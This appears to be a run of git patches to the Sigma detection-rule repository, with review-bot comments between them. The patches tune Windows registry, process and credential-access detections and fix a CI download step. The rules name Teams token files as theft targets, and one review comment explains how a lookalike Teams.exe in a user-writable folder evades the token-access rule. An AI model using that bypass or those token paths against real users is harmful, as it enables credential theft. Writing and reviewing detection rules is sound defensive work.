diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 85eb02878..3af8eef6b 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml @@ -3,6 +3,7 @@ id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 description: Detects when an attacker register a new SIP provider for persistence and defense evasion author: Nasreddine Bencherchali date: 2022/07/21 +modified: 2022/09/21 status: experimental references: - https://persistence-info.github.io/Data/codesigning.html @@ -28,7 +29,11 @@ detection: # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll - condition: all of selection_* and not filter + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|contains: '\CryptSIPDll' + Details: 'C:\Windows\System32\PsfSip.dll' + condition: all of selection_* and not 1 of filter* falsepositives: - Legitimate SIP being registered by the OS or different software. level: medium diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 0f3f90a4a..691ef5e8c 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml 
@@ -6,19 +6,23 @@ author: Florian Roth references: - https://twitter.com/SBousseaden/status/1410545674773467140 date: 2020/07/01 -modified: 2022/03/26 +modified: 2022/09/21 logsource: category: registry_set product: windows detection: selection: - EventType: SetValue + EventType: SetValue TargetObject|contains|all: - '\Control\Print\Environments\Windows x64\Drivers' - '\Manufacturer' Details: '(Empty)' filter_cutepdf: TargetObject|contains: '\CutePDF Writer v4.0\' + filter_vnc: + TargetObject|contains: + - '\VNC Printer (PS)\' + - '\VNC Printer (UD)\' condition: selection and not 1 of filter_* falsepositives: - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index ff88c034d..245de30dc 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -19,6 +19,6 @@ detection: condition: selection falsepositives: - Legitimate administrative action -level: medium +level: medium tags: - attack.defense_evasion From 54add1516734413698adb62171258065458f38f3 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:33 +0200 Subject: [PATCH 87/96] workflow: fix wrong filename --- .github/workflows/sigma-test.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index 60b6cdc96..5cf624347 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml 
@@ -138,10 +138,10 @@ jobs: - uses: actions/checkout@v2 - name: Download evtx-sigma-checker run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker - - name: Download and extract Windows 2022 0 20348 Azure baseline + - name: Download and extract Windows 2022.0.20348 Azure baseline run: | wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz - tar xzf win2022-0-20348.tgz + tar xzf win2022-0-20348-azure.tgz - name: Remove deprecated rules run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' - name: Check for Sigma matches in baseline From f940a43d8f0ef72ee9e4c1b73291a7481f6ae9b1 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:12:30 +0200 Subject: [PATCH 88/96] workflow: use correct rule title --- .github/workflows/known-FPs.csv | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index a22dafcd5..5b36cab65 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -38,4 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe -949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon From cc5cda0a22fea3d89550c013ee7533c562465268 Mon Sep 17 00:00:00 2001 
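Review bot: The step still executes whatever `wget` fetched without any integrity check: neither the `evtx-sigma-checker` binary downloaded in the preceding step nor the `win2022-0-20348-azure.tgz` archive is verified before `tar xzf` and (presumably, in the step after this hunk) the checker is run, so a compromised or replaced GitHub release asset — `$EVTX_BASELINE_VERSION` is a mutable tag, not a digest — would run arbitrary code in the workflow. Pin the expected digests next to the version and verify them, e.g. `echo "${EVTX_SIGMA_CHECKER_SHA256}  evtx-sigma-checker" | sha256sum -c -` after the binary download and `echo "${WIN2022_AZURE_SHA256}  win2022-0-20348-azure.tgz" | sha256sum -c -` before the `tar xzf` line, updating the hashes whenever the version is bumped. `actions/checkout@v2` in the context line is likewise tag-pinned rather than SHA-pinned. The filename mismatch fix itself is correct; the enclosing job definition starts before the hunk.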
From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 14:10:50 +0200 Subject: [PATCH 89/96] fix: needs to be contains now --- .../registry_delete_removal_com_hijacking_registry_key.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 71184d34b..3e97012a9 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -43,7 +43,7 @@ detection: filter_peazip: Image|contains: 'peazip' # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) - TargetObject|startswith: '\PeaZip.' + TargetObject|contains: '\PeaZip.' condition: selection and not 1 of filter_* falsepositives: - Unknown From 6c70c6d35a695229c80ef418cff3c57ea21f13c9 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 22 Sep 2022 17:42:27 +0200 Subject: [PATCH 90/96] Update win_impacket_psexec.yml --- rules/windows/builtin/security/win_impacket_psexec.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_impacket_psexec.yml b/rules/windows/builtin/security/win_impacket_psexec.yml index ff7856880..434d38015 100644 --- a/rules/windows/builtin/security/win_impacket_psexec.yml +++ b/rules/windows/builtin/security/win_impacket_psexec.yml @@ -6,7 +6,7 @@ author: Bhabesh Raj references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html date: 2020/12/14 -modified: 2022/08/11 +modified: 2022/09/22 logsource: product: windows service: security From 24e87d0f341e43b69a0258a12dd22f19d7740f35 Mon Sep 17 00:00:00 2001 
From: Rachel Rice Date: Thu, 22 Sep 2022 17:42:54 +0100 Subject: [PATCH 91/96] fix: Rename Linux process creation rule to use established pattern One rule had filename beginning 'prox' rather than 'proc'. Signed-off-by: Rachel Rice --- ...removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/process_creation/{prox_creation_lnx_chattr_immutable_removal.yml => proc_creation_lnx_chattr_immutable_removal.yml} (100%) diff --git a/rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml similarity index 100% rename from rules/linux/process_creation/prox_creation_lnx_chattr_immutable_removal.yml rename to rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml From 6497cb7745c44b523cfc367f1b533201b3ec422f Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Fri, 23 Sep 2022 03:37:00 +0900 Subject: [PATCH 92/96] Keep at level: low --- .../builtin/application/win_builtin_remove_application.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 1a497e2b6..0106730e8 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,7 +17,7 @@ detection: condition: selection falsepositives: - Unknown -level: informational +level: low tags: - attack.impact - attack.t1489 From ac9b12b6bb973bf9c2b2a72bfec3590c64692e6e Mon Sep 17 00:00:00 2001 
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 23 Sep 2022 07:14:31 +0200 Subject: [PATCH 93/96] Update win_builtin_remove_application.yml --- .../builtin/application/win_builtin_remove_application.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/builtin/application/win_builtin_remove_application.yml b/rules/windows/builtin/application/win_builtin_remove_application.yml index 0106730e8..e9e4cc9d5 100644 --- a/rules/windows/builtin/application/win_builtin_remove_application.yml +++ b/rules/windows/builtin/application/win_builtin_remove_application.yml @@ -17,6 +17,7 @@ detection: condition: selection falsepositives: - Unknown +#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview level: low tags: - attack.impact From 048de3fc81cf6f6457ac46e0a189b89231440dc8 Mon Sep 17 00:00:00 2001 From: Yamato Security <71482215+YamatoSecurity@users.noreply.github.com> Date: Tue, 27 Sep 2022 10:43:38 +0900 Subject: [PATCH 94/96] add diagnosis-scripted to windows services file --- tools/config/generic/windows-services.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 01b6d3de5..9861f29c6 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -166,3 +166,8 @@ logsources: service: bits-client conditions: Channel: 'Microsoft-Windows-Bits-Client/Operational' + windows-diagnosis-scripted: + product: windows + service: diagnosis-scripted + conditions: + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file From dd1fed29a05ae7bcafdf63dfcea0ba11fedc9cbf Mon Sep 17 00:00:00 2001 
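Review bot: The added comment `#Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview` has no space after `#` (yamllint's `comments` rule flags it) and the wording is hard to parse; suggest `# Level kept at low because this event is very verbose; a top-10 of "Product Name" gives a quick overview`. Since `level: low` follows on the next line, the comment's value is the rationale, so keep it focused on that.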
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 27 Sep 2022 06:36:01 +0200 Subject: [PATCH 95/96] Add shell-core service --- tools/config/generic/windows-services.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/tools/config/generic/windows-services.yml b/tools/config/generic/windows-services.yml index 9861f29c6..0ca38a90f 100644 --- a/tools/config/generic/windows-services.yml +++ b/tools/config/generic/windows-services.yml @@ -170,4 +170,9 @@ logsources: product: windows service: diagnosis-scripted conditions: - Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' \ No newline at end of file + Channel: 'Microsoft-Windows-Diagnosis-Scripted/Operational' + windows-shell-core: + product: windows + service: shell-core + conditions: + Channel: 'Microsoft-Windows-Shell-Core/Operational' From 600494adbc74f8ed6b2914f075b8c2e2e2e8ecc4 Mon Sep 17 00:00:00 2001 From: Qasim Qlf Date: Tue, 27 Sep 2022 13:11:08 +0500 Subject: [PATCH 96/96] Fix the filter --- ..._creation_win_teams_suspicious_command_line_cred_access.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml index 3c0eb326c..7d72377f8 100644 --- a/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml +++ b/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml @@ -7,6 +7,7 @@ references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens date: 2022/09/16 +modified: 2022/09/27 logsource: product: windows category: process_creation 
@@ -16,7 +17,7 @@ detection:
 - '\Microsoft\Teams\Cookies'
 - '\Microsoft\Teams\Local Storage\leveldb'
 filter:
- Image|contains: '\Microsoft\Teams\current\Teams.exe'
+ Image|endswith: '\Microsoft\Teams\current\Teams.exe'
 condition: selection and not filter
 falsepositives:
 - Unknown
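Review bot: `Image|endswith` is tighter than the old `contains`, but `\Microsoft\Teams\current\Teams.exe` is the per-user install path (`%LOCALAPPDATA%\Microsoft\Teams\current\`), writable by the same user whose Teams tokens the rule protects, so a low-privileged tool copied to a directory ending in `\Microsoft\Teams\current\` and named `Teams.exe` can read `Cookies`/`leveldb` unseen. Nothing in a process_creation event proves the image is the genuine Teams (`OriginalFileName` is attacker-controllable too), so either drop the filter and list Teams' own access under `falsepositives`, or keep it and record the gap: `# user-writable path: a lookalike Teams.exe under \Microsoft\Teams\current\ bypasses this filter`. Which Teams-spawned command line actually triggered the FP would be worth noting in that comment as well; the `selection` block begins outside the hunk.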